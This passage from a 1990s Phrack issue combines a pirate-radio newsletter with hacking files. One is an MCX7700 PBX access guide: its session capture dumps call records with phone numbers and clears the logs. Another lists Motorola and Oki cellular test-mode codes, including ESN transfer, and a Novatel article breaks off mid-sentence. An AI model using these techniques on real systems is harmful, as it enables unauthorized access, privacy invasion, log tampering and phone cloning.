radio and freedom of speech over radio and won against the old Postal law which considered broadcasting as State Monopoly. Today RMI is one of the major national radio networks with hundreds of repeaters all over the Italian peninsula, while thousands of private radio and TV stations obtained authorizations to broadcast legally over the years. If you have a story to tell on pirate radio, or information to share (voice/paper/email), please get in touch with us. On shortwave we reach also many European Pirates who would love to hear from you. (We indeed carried "legally" some of the pirates programs in the past in order to offer them better coverage to their "alternative" programs. Something we would also like to do again the future.) Please send email to 100020.1013@compuserve.com, including a phone number and times when we can call possibly you from Europe for an interview. We will guarantee anonymity if so desired, since our Shortwave transmissions may also be heard in the USA. We'll love to hear from you! 73, Alfredo --- Alfredo E. Cotroneo, President, NEXUS-International Broadcasting Association PO BOX 10980, I-20110 Milano, Italy phone: +39-2-266 6971 | fax: +39-2-706 38151 --------------------------------------------------------------------------- Notes from the Net on the FCC One person writes about his FCC bust on the Usenet newsgroup alt.radio.pirate: When I was busted in 1984, the FCC used a tan-colored buick passenger car. The passenger seat had been ripped out and was replaced with a rack of receiving equipment--nothing special, just commercially-available stuff. In the trunk was a pair of batteries driving inverters. The engine had a second alternator to charge the batteries. Beneath the vinyl roof was a direction-finding antenna array that was connected to an indicator on the dashboard. They'd just drive in the direction indicated until they reached the transmitter. That car served 3-4 states in the Northwestern US. How do I know all this? After the guy finished writing me up, I asked him to show me his equipment. After all, I showed him mine. He started to say no, but then changed his mind since there was nothing secret involved. Don Hackler responds: When I was engineering an directional AM broadcast station, the station was inspected by two FCC engineers driving a similar car. The roof had been removed and replaced with a fiber glass replica of the original. The antennae were embedded in the new roof, and there were no indications of anything `special' about the roof, inside or out. I was given a ride in the car to go check some of the monitor points with a field-strength meter. The passenger bucket seat had been replaced by a 3 foot tall rack on a swivel mount, so the driver or a passenger in back could operate the equipment. The rack had a slip cover made of upholstery vinyl that matched the car's interior. They refused (nicely) to let me see the equipment, but said it was just standard equipment; i.e. a spectrum analyzer and some general coverage receivers. I never understood why they didn't allow a peek, but I assumed it was probably some policy they were following. That was my first, and so far only, FCC inspection. Don Hackler - donh@shakala.com Shakala BBS (ClanZen Radio Network) Sunnyvale, CA 1-408-734-2289 --------------------------------------------------------------------------- ***** Why Support Micro-Power Broadcasting? ***** Number One: The issue is freedom of speech. It's truly shocking what the Federal Communications Commission has allowed to happen. Media access is becoming too restricted for regular people to get their message across. As each day passes, radio, television, and newspaper media gets gobbled up pac-man style by big outfits like Sony/CBS, GE/NBC, ATT, ABC, Time-Warner Communications, Hearst, Gannett, Disney, Ted Turner, or even Fox. Our local media mogul, James Gabbert, owns an AM, FM, and television station in the same area. Middle America gets bombarded with religious broadcasters and urban areas get millions of watts of commercial crap beaming out from huge towers. Arbitron and Neilson decide which stations have what percentage of the listening audience. This situation must be changed so that truly free communication can have a chance to survive. In the 90's we need some space on the broadcast bands for community radio and television. Cable TV is promising hundreds of channels to choose from, but most of this stuff will be generated by the existing media networks. The problem here is that minority opinions are not heard. Censorship can not be tolerated in a democratic society. Freedom of information is what we need. Number Two: The technology has changed. It used to be very expensive to run a radio station. With modern electronics, however, small radio stations can be on the air with a minimal investment. In fact, people in Japan have been doing micro-power broadcasting for years. Most people in the U.S. just have AM, FM, and TV receivers. To reach these people, you usually have to buy advertising time on a commercial station. That's assuming some station is willing to broadcast your tape! What we want is true public access to the airwaves for everyone, not just the rich and powerful. The cloud of secrecy about broadcasting has lifted and now we know that media power has been stolen by our own government, and sold to the highest bidder. People need media access because human beings have a natural need to communicate with each other. Cable TV and Audio service should feature input from the community at large. The old concept of standing on a soap box and calling out to your fellow citizens will not work in the computer age. Number Three: Health Concerns about Radio energy, in large doses, it is considered by some to be a real health hazard. Incidence of leukemia and cancer runs high among men who work on high power transmitting towers. People in San Francisco get blasted with literally millions of watts of energy coming from Sutro Tower. This is because some radio and television stations want to be picked up 100 miles away. Scientific opinion on the effects of exposure to radio waves varies quite a bit, but if you're one of those people living up near Sutro Tower, maybe you should move. Micro-power is the sane way to use radio and tv. The space on the radio and tv dial should be spread around to all interested parties, not just a small group of companies. Broadcast power levels for all stations should come down to safer levels. -Paul Griffin --------------------------------------------------------------------------- ***** KITS FROM FREE RADIO BERKELEY ***** First, a word from our legal department: For educational purposes only. These kits are offered for the furtherance of one's knowledge regarding radio frequency design and principles. At all times during operation the assembled unit must be connected to a dummy load. Part 15 of the FCC rules prohibits an antenna being used with these units. All responsibilities for the ultimate use of these kits are born solely by the builder and/or operator. KITS AVAILABLE NOW ! All kits are complete and come with professionally manufactured, drilled and tinned PC boards. All coils are pre-wound. Each unit, unless specified, requires 12 volts for proper operation. Full instructions and diagrams included. 5 Watt FM Transmitter - $45 An improved version of the Panaxis 5 watt design with a much more rugged output transistor capable of producing 6-7 watts. Oscillator is a stable FET based VFO. 6 watt RF Amplifier - $25 Uses the same output transistor as above. Will produce 6 watts for 1/2 watt input drive. Easy, quick assembly. 15 watt RF Amplifier - $35 Uses a very high gain (14dB) RF transistor to boost a 1/2 watt input to 15 watts. Complete with PC Board and all required parts. 25-30 watt RF Amplifier - $35 Will produce full power with an input drive of 4-5 watts. 1/2 to 1 watt Amplifier - $18 1/2 to 1 watt output for an input power of 10 mw. Great for boosting lower power VFOs. Output Filter Kit - $5.00 A seven element low pass filter, composed of 4 coils and 3 capacitors, to flatten those harmonics. Specify cutoff frequency desired. COMING REAL SOON ! 1/2 - 1 watt Stereo Broadcast Transmitter - $35 A vast improvement over the Ramsey FM-10. It uses the BA1404 IC as a stereo modulator only to modulate a FET vfo, buffer and amp chain. Better audio input filtering and bypassing. IC voltage regulation for the 2.5 volt supply for the BA1404. A very rugged output stage and collector voltage bypassing make this unit stand out from all other transmitter designs using the BA1404 chip. Stereo Audio Processor - $Price to be determined A combined stereo generator using the BA1404 coupled with compandor ICs for compression and limiting of audio signals If you have any other particular requirements please let us know. Custom design and fabrication services are available including PC layout and production. Full CAD services as well. Proceeds from the sales of these kits go to the furtherance of micro power broadcasting, bringing a voice of empowerment to every community. Please add $3.00 for handling and shipping for each kit. Payment to be made out to cash or to Stephen Dunifer, we are still working out the bank trip. Send to: Free Radio Berkeley 1442 A Walnut St., #406 Berkeley, CA 94709 Voice mail: (510) 464-3041 --------------------------------------------------------------------------- On the Air Free Radio Berkeley - Sundays from 9 PM to 12 Midnight at 88.1 FM. Call their voice mail # (510) 464-3041 for further information. Or write them: 1442 A Walnut St., #406, Berkeley, 94709. San Francisco Liberation Radio - Wednesdays & Saturdays from 8 PM to 10 PM at 93.7 FM. Call their voice mail # (415) 487-6308 for further information and to help out. Or write them: San Francisco Liberation Radio, 350 7th. Ave, Box35, San Francisco CA, 94118. Southern Marin, San Rafael Area - schedule not known at this time, try 87.9 FM. Southern Marin, Sausalito - left end of the dial most every night, try 87.9 FM. Mission District, SF - LaRaza station, schedule not known, try 87.9 FM Santa Cruz - Either on the air or soon to be, schedule & frequency not known at this time More stations taking to the air all the time, look for a whole network to be happening in Berkeley. An attendee of the New York City workshop is on the air in Connecticut with 5 watts as Ragged Mountain Liberation Radio. Phone calls are coming in from around the country, keep those calls and letters coming. From San Francisco Liberation Radio: Each SFLR program closes with the words: "Fascists are like cockroaches. Shine a light on them and they scurry away. And together, you and I can be the light." Richard Edmondson of SFLR, author of that slogan, said, "Well, first and foremost of all it seemed like a truism, and it seemed like the sort of phrase to end a radio program with - catchy." Stephen Dunifer with Free Radio Berkeley added, "Yes, but cockroaches do not carry guns". One of Free Radio Berkeley's favorite tag lines is "Are you going to continue to live the lie or are you going to act the truth ? Both San Francisco Liberation Radio and Free Radio Berkeley have been carrying a lot of very diverse and interesting programming ranging from Food Not Bombs Radio Network programs to Jello Biafra declaring that Urinalysis is Freedom to local street interviews to an interview with the former program director at Pacicifa station WPFW in Washington, DC. If you are interested in producing programs, conducting news gathering and interviews, etc. or have tapes of your band, performance piece, etc. or wish to help out in any other way, please contact either Free Radio Berkeley or San Francisco Liberation Radio. Tapes may be mailed to the return address on this newsletter in care of Free Radio Berkeley. Let your voices and performance art be heard ! --------------------------------------------------------------------------- In the Media Within the last few months, a considerable amount of media attention has been focused on Micropower Broadcasting. Articles have appeared in the East Bay Express, SF Weekly, Bay Guardian, Oakland Tribune, San Jose Mercury, Daily Cal, SF Chronicle, Berkeley Voice and New York Daily News. CNN put together a news story about Free Radio Berkeley which aired nationally and was picked up and rebroadcast by Channel 2 in Oakland. More coverage is expected to be forthcoming. An article may appear in the New York Times. KQED radio is working on a story. A fifteen page article on guerilla media will be in Mondo 2000, due out the first of November. Channel 31 (Marin County) is covering one of the broadcast operations in San Rafael. A press and info packet is going to be sent out around the country. Any help you can offer in the area of community and media outreach would be greatly appreciated. It is our intent to build an international movement and coalition. Contact the Free Communications Coalition (510) 464-3041 --------------------------------------------------------------------------- FUND RAISING VIDEO PARTY Featuring: Pump Up the Volume, Medium Cool and videos from Black Liberation Radio Saturday, November 13 - 8 PM 809 B Allston Way, Berkeley (two blocks south of University Ave., between 5th and 6th streets) $5-? donation. Free popcorn provided. Help us pay our operational expenses. ___________________________________________________________________________ HELP TAKE BACK THE AIRWAVES FREE COMMUNICATIONS COALITION MEETING Saturday, November 13 - 5 PM 809 B Allston Way, Berkeley With the dramatic increase in publicity (Free Radio Berkeley made the front page of the Sunday New York Times - Oct. 24) and response we have experienced in the last month or so, it is rather important that all of us who are concerned with the defense, support and promotion of micro power broadcasting come together to plan and create a strategy which will lead to the Free Communications Coalition (the Peoples' FCC) becoming an international umbrella under which micropower broadcasting can flourish. To that end, you are invited to attend the meeting of the Free Communications Coalition on Saturday, November 13 at 5 PM. It will be held at 809 B Allston Way (between 5th & 6th streets) in Berkeley. This will be a pot luck dinner meeting, bring a vegetarian dish to share. Following, at 8PM will be a video benefit, see above for further details. ==Phrack Magazine== Volume Five, Issue Forty-Five, File 25 of 28 **************************************************************************** /////////////// THE MCX7700 PABX SYSTEM //////////////// /////////////// Brought to you courtesy of [)elamo Labz //////////////// ////////////// and the ChUrCH oF tHE Non-CoNForMiST++ //////////////// (warespeoplessuckwarespeoplessucksuksuk) Greetings from myself, The Evil [)r. [)elam! In this text file I present a PBX that identifies itself as an "MCX7700"... probably the easiest PBX hack you'll find, and not a bad system... I've seen worse. Dis'-claimer: (This is the part where I get to Dis' the system.) ------------- This particular system is wide open and it's not my problem the owners decided to buy a lame system. Via freedom of the press I am publishing my findings, so if anyone gets pissed off about this file *PHUCK 0FF*! Ab-Using the system: -------------------- Once a data connection is established, press the '*' key to enter programming mode. In programming mode, all commands are given as 2 digit combinations. Some of the commands are macros of other commands. Example: command 50 will do a command 15 plus enter a response to the question "Clear all call records Yes/No". This particular system uses only extensions.. not accounts, but has the capability to do both. The system sends EOF (CTRL-Z) characters after every command, this is NOT something I typed. I replaced all occurrences of CTRL-Z characters with <-CTRL Z-> in this phile for obvious reasons. Note to | 44 Reports a number 45 ? 46 Block Check 50 Clear all call records macro.. pipes a yes into command 15 51 52 53 Sort call stats by a specified phone number 54 Area code sort 55 Exceptions reports (Most expensive / longest / most frequent calls) 60 "INTERACTIVE MODE" 61 62 63 64 Displays a number (5997777B) 65 Displays system type (MCX-7700/PC V4.0.5 1189) 67 Set SMDR input 68 Display SMDR inputs 69 70 Full buffer program 71 Auto report program 1 72 Auto report program 2 73 Set index number 74 Set rate table 75 Rate table sizes 76 Pricing types 79 80 90 Display full buffer program 91 Display auto report program 1 92 Display auto report program 2 93 List index table 94 List rate table 95 Display rate table sizes 96 Display pricing types 97 Invalid command 98 Invalid command 99 Call record dump "*" key starts programming mode key aborts commands: "+++ FUNCTION CANCELED +++" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Here's a capture from a session online. (edited for brevity) Settings: Wordlength 8, Parity None, Stop bits 1 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ CONNECT 1200 << Pressed '*' key >> PROGRAMMING ENABLED 09/05/92 8:31A <-CTRL Z-> COMMAND ?15 CLEAR CALL RECORDS - ARE YOU SURE ? <-CTRL Z-> COMMAND ?17 SET TRUNK ASSIGNMENTS POSITION ? -+++ FUNCTION CANCELED +++ <-CTRL Z-> COMMAND ?30 SYSTEM PARAMETERS] PRTR DIAGNOSTICS SMDR FORM-FEED EXPAND ESC TYPE A R D BAUD SIM LNG ON OFF SEQ 2 N N N 2 N 66 014 015 000 ACCOUNTS ------TRUNKS------ EXT ACCESS TOLL SIZE NO. NO. '-' GRP EQP SIZE ABS COST DIG 04 1024 040 N 2 3 3 Y N 1 CALL ----DROP OR REJECT--- AUTO TO- LIST GRACE LOC ACT INC TRK EXT PRD DAY NULL 05 N N N N N 0 Y N SER PC ZERO IAL PORT OPR Y Y Y <-CTRL Z-> COMMAND ?35 TRUNK USAGE SORT: SUMMARY ?Y SUMMARY OF TRUNK USAGE REPORT PERIOD PAGE 1 09/01/92 - 09/05/92 09/05/92 8:35A TRUNK TOTAL TOTAL AVG TIME COSTED TOTAL USED CALLS TIME PER CALL TIME COST ------ ------ ------- -------- ------ ---------- 8080 0 0 0.0 0 $ 0.00 8086 0 0 0.0 0 $ 0.00 8087 0 0 0.0 0 $ 0.00 80001 9 47 5.2 12 $ 3.11 80002 6 12 2.0 7 $ 2.13 80003 17 57 3.3 7 $ 2.21 80004 12 35 2.9 9 $ 2.21 80005 12 15 1.2 4 $ 1.50 80006 13 24 1.8 0 $ 0.00 80007 6 19 3.1 9 $ 2.42 80008 12 39 3.2 1 $ 0.25 80009 10 45 4.5 17 $ 4.50 80010 8 42 5.2 9 $ 2.30 80011 14 46 3.2 10 $ 2.61 80012 11 98 8.9 70 $ 16.14 80013 8 26 3.2 3 $ 1.21 80014 13 34 2.6 12 $ 3.03 80015 14 32 2.2 5 $ 1.50 80016 0 0 0.0 0 $ 0.00 86001 0 0 0.0 0 $ 0.00 86003 0 0 0.0 0 $ 0.00 87001 82 270 3.2 270 $ 60.31 87002 79 256 3.2 256 $ 59.52 84002 0 0 0.0 0 $ 0.00 95001 0 0 0.0 0 $ 0.00 0 0 0.0 0 $ 0.00 ------ ------ ------- -------- ------ ---------- TOTAL 326 1097 3.3 701 $ 164.95 <-CTRL Z-> COMMAND ?36 CALL RECORD DUMP : DETAIL?Y REPORT OF ALL CALL RECORDS REPORT PERIOD PAGE 1 09/01/92 - 09/05/92 09/05/92 8:36A EXTEN- TRUNK NUMBER DURATION ACCOUNT SION USED DIALED DATE TIME MINUTES COST CODE ------ ------ ---------------- -------- ------ -------- -------- ------------ 718 80009 ( )911-0000 09/01/92 7:55A 0.5 $ .00 311 80011 ( )911-0000 09/01/92 7:55A 1.3 $ .00 278 80009 (800)944-1535 09/01/92 8:16A 3.0 $ .00 255 80005 (800)944-1535 09/01/92 8:19A 1.3 $ .00 261 87001 ( )660-5525 09/01/92 8:28A 4.2 $ .95 201 80004 (800)944-1535 09/01/92 8:33A 1.9 $ .00 315 87002 ( )841-2586 09/01/92 8:34A 2.3 $ .57 314 87001 ( )290-1030 09/01/92 8:44A 3.4 $ .76 735 87002 (813)293-4319 09/01/92 8:44A 2.5 $ .71 735 87002 (813)293-4319 09/01/92 8:58A 1.2 $ .49 255 80009 (800)944-1535 09/01/92 8:56A 6.9 $ .00 247 80015 (800)944-1535 09/01/92 9:02A 3.7 $ .00 261 80011 O (513)825-3931 09/01/92 9:09A 3.6 $ .00 261 87001 ( )644-1061 09/01/92 9:16A 1.3 $ .38 <> <-CTRL Z-> COMMAND ?00] PROGRAMMING TERMINATED PROGRAMMING ENABLED 09/05/92 8:40A <-CTRL Z-> COMMAND ?37 ]TRUNK ASSIGNMENTS 09/05/92 8:40A PAGE 1 TRUNK 000 = ,00 TRUNK 001 = 8080,01 TRUNK 002 = 8086,01 TRUNK 003 = 8087,01 TRUNK 004 = ,00 TRUNK 005 = ,00 TRUNK 006 = ,00 TRUNK 007 = ,00 TRUNK 008 = ,00 TRUNK 009 = ,00 TRUNK 010 = ,00 TRUNK 011 = ,00 TRUNK 012 = ,00 TRUNK 013 = ,00 TRUNK 014 = ,00 TRUNK 015 = ,00 TRUNK 016 = 80001,01 TRUNK 017 = 80002,01 TRUNK 018 = 80003,01 TRUNK 019 = 80004,01 TRUNK 020 = 80005,01 TRUNK 021 = 80006,01 TRUNK 022 = 80007,01 TRUNK 023 = 80008,01 TRUNK 024 = 80009,01 TRUNK 025 = 80010,01 TRUNK 026 = 80011,01 TRUNK 027 = 80012,01 TRUNK 028 = 80013,01 TRUNK 029 = 80014,01 TRUNK 030 = 80015,01 TRUNK 031 = 80016,01 TRUNK 032 = 86001,01 TRUNK 033 = 86003,01 TRUNK 034 = 87001,01 TRUNK 035 = 87002,01 TRUNK 036 = 84002,01 TRUNK 037 = 95001,01 TRUNK 038 = ,00 TRUNK 039 = ,00 TRUNK 040 = ,00 <-CTRL Z-> COMMAND ?15 CLEAR CALL RECORDS - ARE YOU SURE ? Y END DATE NOT FOUND -- CLEAR ALL ??<-CTRL Z-> << Nice command!.. 50 is a macro using command 15 with a Y piped into it >> OK 51 <-CTRL Z->] <-CTRL Z-> COMMAND ?54 AREA CODE SORT SUMMARY OF AREA CODES REPORT PERIOD PAGE 1 09/01/92 - 09/05/92 09/05/92 9:15A AREA TOTAL TOTAL AVG TIME AVERAGE TOTAL CODE TIME CALLS PER CALL COST COST ------ ------- ------ -------- -------- ---------- *** 357 139 2.5 $ .52 $ 72.89 212 24 8 3.0 $ .84 $ 6.75 215 1 1 1.0 $ .46 $ 0.46 216 4 1 4.0 $ .92 $ 0.92 303 6 3 2.0 $ .58 $ 1.75 305 3 2 1.5 $ .38 $ 0.77 404 4 2 2.0 $ .69 $ 1.38 504 3 2 1.5 $ .46 $ 0.92 508 5 4 1.2 $ .37 $ 1.50 513 11 2 5.5 $ .80 $ 1.61 516 19 4 4.7 $ 1.18 $ 4.75 606 11 1 11.0 $ 2.53 $ 2.53 612 1 1 1.0 $ .50 $ 0.50 615 5 1 5.0 $ 1.15 $ 1.15 703 9 1 9.0 $ 2.30 $ 2.30 708 9 3 3.0 $ 1.00 $ 3.00 800 371 109 3.4 $ .00 $ 0.00 813 96 21 4.5 $ 1.11 $ 23.49 818 1 1 1.0 $ .50 $ 0.50 904 93 19 4.8 $ 1.21 $ 23.06 912 64 1 64.0 $ 14.72 $ 14.72 ------ ------- ------ -------- -------- ---------- TOTAL 1097 326 3.3 $ .50 $ 164.95 <-CTRL Z-> COMMAND ?55 EXCEPTION REPORTS REPORT OF MOST EXPENSIVE CALLS REPORT PERIOD PAGE 1 09/01/92 - 09/05/92 09/05/92 9:16A EXTEN- TRUNK NUMBER DURATION SION USED DIALED DATE TIME MINUTES COST ------ ------ ---------------- -------- ------ -------- -------- 246 80012 (912)354-2813 09/01/92 2:33P 63.5 $ 14.72 316 87001 (813)299-2068 09/03/92 4:16P 36.9 $ 8.19 248 87002 ( )863-5701 09/03/92 11:28A 21.5 $ 4.89 261 87002 (904)677-1235 09/03/92 2:20P 15.3 $ 3.72 261 87002 (904)677-1235 09/01/92 3:36P 13.1 $ 3.26 255 87001 (813)293-4319 09/04/92 9:36A 13.6 $ 3.13 270 87002 ( )649-4966 09/04/92 11:32A 14.3 $ 2.85 261 87001 ( )660-5567 09/01/92 10:16A 14.8 $ 2.85 200 87002 (904)599-1543 09/03/92 3:27P 11.2 $ 2.80 266 80009 (516)785-1200 09/03/92 3:32P 10.5 $ 2.75 261 87001 ( )660-5525 09/04/92 12:48P 13.2 $ 2.66 268 80014 (606)282-7223 09/03/92 11:00A 10.9 $ 2.53 246 87002 (904)677-2551 09/03/92 3:05P 9.7 $ 2.34 261 80010 (703)845-1400 09/01/92 9:23A 9.1 $ 2.30 316 87002 ( )290-1030 09/02/92 3:04P 11.8 $ 2.28 246 87002 (904)677-6774 09/01/92 2:20P 8.5 $ 2.11 316 87001 ( )290-1030 09/03/92 2:58P 10.5 $ 2.09 316 87001 ( )290-1030 09/02/92 8:56A 9.6 $ 1.90 316 80004 (212)605-8586 09/02/92 1:58P 6.9 $ 1.75 270 80001 (513)568-4933 09/03/92 9:15A 7.0 $ 1.61 REPORT OF LONGEST CALLS REPORT PERIOD PAGE 1 09/01/92 - 09/05/92 09/05/92 9:16A EXTEN- TRUNK NUMBER DURATION SION USED DIALED DATE TIME MINUTES COST ------ ------ ---------------- -------- ------ -------- -------- 246 80012 (912)354-2813 09/01/92 2:33P 63.5 $ 14.72 316 87001 (813)299-2068 09/03/92 4:16P 36.9 $ 8.19 261 80001 (800)727-5663 09/04/92 2:06P 25.8 $ .00 248 87002 ( )863-5701 09/03/92 11:28A 21.5 $ 4.89 261 87002 (904)677-1235 09/03/92 2:20P 15.3 $ 3.72 261 87001 ( )660-5567 09/01/92 10:16A 14.8 $ 2.85 270 87002 ( )649-4966 09/04/92 11:32A 14.3 $ 2.85 255 87001 (813)293-4319 09/04/92 9:36A 13.6 $ 3.13 261 87001 ( )660-5525 09/04/92 12:48P 13.2 $ 2.66 261 87002 (904)677-1235 09/01/92 3:36P 13.1 $ 3.26 260 80003 (800)999-4441 09/03/92 11:49A 12.9 $ .00 270 80010 (800)342-3763 09/02/92 3:32P 12.5 $ .00 316 87002 ( )290-1030 09/02/92 3:04P 11.8 $ 2.28 252 80015 (800)944-1535 09/04/92 9:00A 11.5 $ .00 252 80008 (800)944-1535 09/02/92 11:07A 11.5 $ .00 200 87002 (904)599-1543 09/03/92 3:27P 11.2 $ 2.80 315 80009 (800)622-4448 09/02/92 10:33A 11.2 $ .00 268 80014 (606)282-7223 09/03/92 11:00A 10.9 $ 2.53 315 80011 (800)622-4448 09/02/92 3:35P 10.8 $ .00 264 80012 (800)527-2274 09/03/92 3:12P 10.7 $ .00 REPORT OF MOST FREQUENT NUMBERS REPORT PERIOD PAGE 1 09/01/92 - 09/05/92 09/05/92 9:16A NUMBER TOTAL TOTAL AVRG TOTAL DIALED CALLS TIME DRTN COST ---------------- ------ ------- ----- ---------- ( )290-1030 53 131 2.4 $ 27.91 (800)944-1535 37 121 3.2 $ 0.00 (800)812-5386 15 15 1.0 $ 0.00 ( )411-0000 13 13 1.0 $ 0.00 ( )660-5525 13 36 2.7 $ 7.98 (813)293-4319 11 38 3.4 $ 9.35 (904)677-1235 9 46 5.1 $ 11.43 (800)622-4448 8 45 5.6 $ 0.00 ( )660-5524 5 11 2.2 $ 2.02 ( )295-9119 5 11 2.2 $ 2.28 ( )660-5528 5 13 2.6 $ 2.47 (516)785-1200 4 19 4.7 $ 4.75 (800)342-3064 4 4 1.0 $ 0.00 (800)888-6823 4 16 4.0 $ 0.00 ( )660-5543 4 4 1.0 $ 1.14 (508)960-6186 4 5 1.2 $ 1.50 (800)526-4371 3 6 2.0 $ 0.00 ( )863-5701 3 32 10.6 $ 7.19 (212)708-1728 3 10 3.3 $ 2.75 (303)586-2030 3 6 2.0 $ 1.75 <-CTRL Z-> COMMAND ?65 MCX-7700/PC V4.0.5 1189 EB4B E46D 1265 0101 <-CTRL Z-> COMMAND ?10 SYSTEM PARAMETERS MENU PRINTER = 1 PABX = 2 REPORT = 3 OPTIONS = 4 SELECT FUNCTION : 2 ACCOUNTS ------TRUNKS------ EXT ACCESS TOLL SIZE NO. NO. '-' GRP EQP SIZE ABS COST DIG 04 1024 040 N 2 3 3 Y N 1 -+++ FUNCTION CANCELED +++ <-CTRL Z-> COMMAND ?10 SYSTEM PARAMETERS MENU PRINTER = 1 PABX = 2 REPORT = 3 OPTIONS = 4 SELECT FUNCTION : 3 CALL ----DROP OR REJECT--- AUTO TO- LIST GRACE LOC ACT INC TRK EXT PRD DAY NULL 05 N N N N N 0 Y N -+++ FUNCTION CANCELED +++ <-CTRL Z-> COMMAND ?10 SYSTEM PARAMETERS MENU PRINTER = 1 PABX = 2 REPORT = 3 OPTIONS = 4 SELECT FUNCTION : 4 SER PC ZERO IAL PORT OPR Y Y Y -+++ FUNCTION CANCELED +++ <-CTRL Z-> COMMAND ?00 <<00 terminate programming>> ****************************************************************************** <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><> Ending notes: ------------- I've had this system laying around for the past 2 years and never gave a flying fuck about it, yet when I find new systems I am unfamiliar with I always wonder why the hell no one writes a phile on 'em to pass on the knowledge. Anyway, to all who have hacked not-so-well-known systems, or even something you consider lame, WRITE A PHILE ON IT!! If enough people start doing this, a newz letter could be started.. call it LSD (Lame Systemz Digest) or something. Woa, what a concept! ++++++ Quantula Sapientia Regitur Mundus ! ++++++ (What little wisdom is shown in the government of the world) Greetz 2: --------- Kaleidox, Garbage Heap & P/S, Night Ranger, Con Artist, Green Hell, Maldoror (The OLD Hannibal), Citizen-One, Speed Demon, The Pyrotechnic, Knight Lightning, King Cobra, Death Wish, Shadow Runner, Axiom Codex, Phunatic Phreak, and all the other K-rad people I forgot to mention. <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><> ****************************************************************************** ==Phrack Magazine== Volume Five, Issue Forty-Five, File 26 of 28 ****************************************************************************** Cellular Debug Mode Commands ************************************** Motorola test mode programing codes for most motorola phones ************************************** 01# Restart (re-enter DC power start-up routine) 02# Display Current Telephone Status 04# Initializes Telephone to Std. Default Conditions 05# TX Carrier On (key transmitter) 06# TX Carrier Off 07# RX Off (mute receiver audio) 08# RX Audio On (unmute receiver audio) 09# TX Audio Off 10# TX Audio On 11(ch.no.)# Set Transceiver to channel (RX & TX) 12# Set power level 13# Power Off 14# 10 khz Signalling Tone On 15# 10 khz Signalling Tone Off 16# Setup (Transmits a five word RECC message) 17# Voice (Transmits a two word REVC message) 18# C-SCAN 19# Display Software Version Number (year & week) 25# SAT On 26# SAT Off 27# Transmit Data (TX continuous control channel data) 32# Clear (clears non-volatile memory) 33# Turn DTMF on 34# Turn DTMF off 35# Display RSSI ("D" series portable only) 35# Set Audio path 38# Display ESN (displays ESN in four steps, hit * till back at start) 39# Compander On 41# Enables Diversity 42#,43#,44# Disable Diversity (different models use different codez) 45# Display Current RSSI 46# Display Cumulative Call Timer 47# Set Audio level 48# Side Tone On 49# Side Tone Off 55# Display and or program NAM (test mode programing) 58# Compander On 59# Compander Off 61# ESN Transfer (for series I and Mini T.A.C's) 62# Turn On Ringer 63# Turn Off Ringer 66# Identity Transfer (series II and some current portables) 68# Display FLEX and Model info 69# Used with Identity Transfer *************************************** *************************************** 1. Entering test mode on 25 pin transceivers is as follows: for F19ATA or F19CTA ground pin 11 and power-up phone, for DMT/Mini T.A.C series I, II, III ground pin 21 and power-up phone. 2. Entering test mode on OEM 32 pin transceivers is as follows: ground pin 9 and power-up phone. 3. Entering test mode on portable phones is as follows: ground pin 6 and power-up phone. 4. Entering test mode on Micro T.A.C's phones is as follows: ground pin 2 and power-up phone. ------------------------------------------------------------------------------ Oki Debug Commands - Good Timing From Nuts & Volts Dec. 1993 To Enter Debug Mode: Press 7 & 9 Together then press MENU, SEND, END, RCL, STO and CLR then press 1 & 3 together Commands: #01 Suspend Performs Initialization #02 Restart Terminates the test mode #03 Status Shows the current status of TRU #04 Reset Resets the timer #07 Carrier On Turns the carrier on #08 Carrier Off Turns off the carrier #09XXXX Load Synth Sets the synthesizer to channel XXXX #10X Set Attn Sets the RF power attenuation to X #11 RX Mute Mutes the receive audio #12 RX Unmute Unmute the receive audio #13 TX Mute Mutes the transmit audio #14 TX Unmute Unmutes the transmit audio #16 ST On Transmits a signalling tone #17 ST Off Turns off the signalling tone #18 Setup Transmits a 5 word RCC message #19 Voice Transmits a 2 word RVC message #20 Rcv SU Receives a 2 word FCC message #21 Rcv VC Receives a 1 word FVC message #22 Send NAM Returns the information contained in the NAM #23 Version Displays the TRU software version #24 Send SN Displays the ESN #25XXXX Mem Displays the resident memory data at XXXX #28 WSTS Receive 1 word messages on CC until #56/CLR #29 WSTV Receive 1 word messages on VC until #56/CLR #32X SAT On Enables the transmission of SAT X #33 SAT Off Disables the transmission of SAT #35 Hi TN On Activates the 1150 Hz tone to receive audio line #36 Hi TN Off Deactivates the 1150 Hz tone #37 Lo TN On Activates the 770 Hz tone to receive audio line #38 Lo TN Off Deactivates the 770 Hz tone #42XX DTMF On Enables the transmission of DTMF frequency XX #43 DTMF Off Disables the transmission of DTMF ------------------------------------------------------------------------------ Novatel 8325 ------------ This article is copyright 1993 by the author. Reproduction is allowed, with the following restrictions: 1) Any copy, or edited version, of this file must contain this copyright notice, the author's name, and the information regarding Phrack. 2) No commercial use may be made of it without prior permission of the author. This permission may be revoked at any time, in which case all reproduction must cease, and any copies must be destroyed. 3) Use as evidence in a court of law, for the purposes of this agreement, is considered a commercial use. 4) This agreement can not be changed, or added to in any way. Receipt of this work through an authorized commercial distributor does not imply permission given to the commercial consumer to re-distribute it in a commercial manner. 5) Any part of this agreement found invalid by a court of law does not render the remainder of this agreement void: The rest of the terms of the agreement must still be adhered to. The Novatel 8325 is a bag-style portable cellular telephone. It is known as a 'ProClassic' in Novatel MarketSpeak. Two different handsets (control units) are used with the 8325 transceiver: the 4130 and 5160. My phone has the 5160. The handsets appear very similar: I doubt there is any functional difference between them. Earlier transceivers, such as the 8320, contain many of the same features as the 8325, though the hidden menus are accessed with different codes. The only other code I know of is #746, which is the code for the 8320 CFG menu. Terms: Throughout this article, I will refer to things without explaining them each time. If you get lost, refer to the table below. NORMAL = the phone is in this mode when it is not locked, or in either of the hidden menus, or in the 'user' menus accessed by the MENU key. The screen will display either READY or SCANNING when in normal mode. This is the mode the phone is in when it is first turned on. LOCKED = when the phone displays LOCKED, a code must be typed to enter normal mode. The default code is 1234. The telephone can be locked using [FCN] 1 [SND] from normal mode. The phone must be locked before entering in any of the codes to access the hidden menus described below. TBL = troubleshooting mode = the hidden menu accessed with 546*. This is a menu supposedly know only to 